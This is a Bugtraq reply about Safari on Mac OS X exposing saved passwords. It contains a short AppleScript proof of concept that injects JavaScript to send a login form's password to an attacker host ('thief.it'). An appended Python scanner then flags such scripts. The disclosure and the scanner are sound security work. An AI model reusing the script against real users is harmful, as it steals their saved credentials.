Bugtraq mailing list archives
Re: RE: Apple Safari on MacOSX may reveal user's saved passwords
From: poplix () papuasia org
Date: 14 May 2007 22:35:00 -0000
Mark, you read it correctly and you're right, anyway a malicious user at your console should not be able to read your passwords.

Also note that to steal saved passwords it's sufficient to entice a victim to execute a malicious script like that:

--BOF
tell application "Safari"
    open location "https://www.target.com"
end tell
do shell script "/bin/sleep 10"
tell application "Safari"
    do JavaScript "document.location.href='http://thief.it/steal_target?p='+document.loginform.password.value" in document 1
end tell
--EOF

I agree with you in saying that the execution of malicious scripts can lead to much more dangerous attacks, anyway I consider this a vulnerability and I don't know why Apple believes this is the correct behaviour...

many thanks for your comment

-p
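Added example, not part of the original post or of any Apple tooling: a static check a reviewer could run over AppleScript source before executing it, flagging `do JavaScript` statements sent to Safari that read a form field's value and reference a host other than the one the script opened. The function name `scan_applescript` and the severity labels are hypothetical, and the parser assumes only `tell application` blocks (no nested `tell window` blocks).

```python
import re

# Scanner input: the script quoted in the message above (parsed as text, never run).
SAMPLE = '''tell application "Safari"
open location "https://www.target.com"
end tell
do shell script "/bin/sleep 10"
tell application "Safari"
do JavaScript "document.location.href='http://thief.it/steal_target?p='+document.loginform.password.value" in document 1
end tell
'''

TELL = re.compile(r'^\s*tell\s+application\s+"([^"]+)"(?:\s+to\s+(.*?))?\s*$', re.I)
END_TELL = re.compile(r'^\s*end\s+tell\b', re.I)
DO_JS = re.compile(r'\bdo\s+JavaScript\s+"((?:[^"\\]|\\.)*)"', re.I)
OPEN_LOC = re.compile(r'\bopen\s+location\s+"https?://([^/"]+)', re.I)
URL_HOST = re.compile(r"""https?://([^/'"?\s\\]+)""", re.I)
FIELD_READ = re.compile(r'\.value\b')

def scan_applescript(source):
    """Return one finding per `do JavaScript` statement addressed to Safari."""
    stack, opened, findings = [], set(), []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = TELL.match(line)
        if m and m.group(2) is None:      # block form: remember the target app
            stack.append(m.group(1).lower())
            continue
        if END_TELL.match(line):
            del stack[-1:]                # tolerate an unmatched "end tell"
            continue
        # A one-line "tell ... to <stmt>" names its own target; else use the block's.
        app = m.group(1).lower() if m else (stack[-1] if stack else None)
        stmt = m.group(2) if m else line
        if app != "safari":
            continue
        # Hosts the script itself navigated Safari to count as expected.
        opened.update(h.lower() for h in OPEN_LOC.findall(stmt))
        js = DO_JS.search(stmt)
        if js:
            hosts = {h.lower() for h in URL_HOST.findall(js.group(1))}
            external = sorted(hosts - opened)
            reads = bool(FIELD_READ.search(js.group(1)))
            findings.append({"line": lineno, "reads_field_value": reads,
                             "external_hosts": external,
                             "severity": "high" if reads and external else "review"})
    return findings
```

Any `do JavaScript` sent to Safari is reported at least as "review", since the injected code runs in the context of whatever page is loaded in the addressed document.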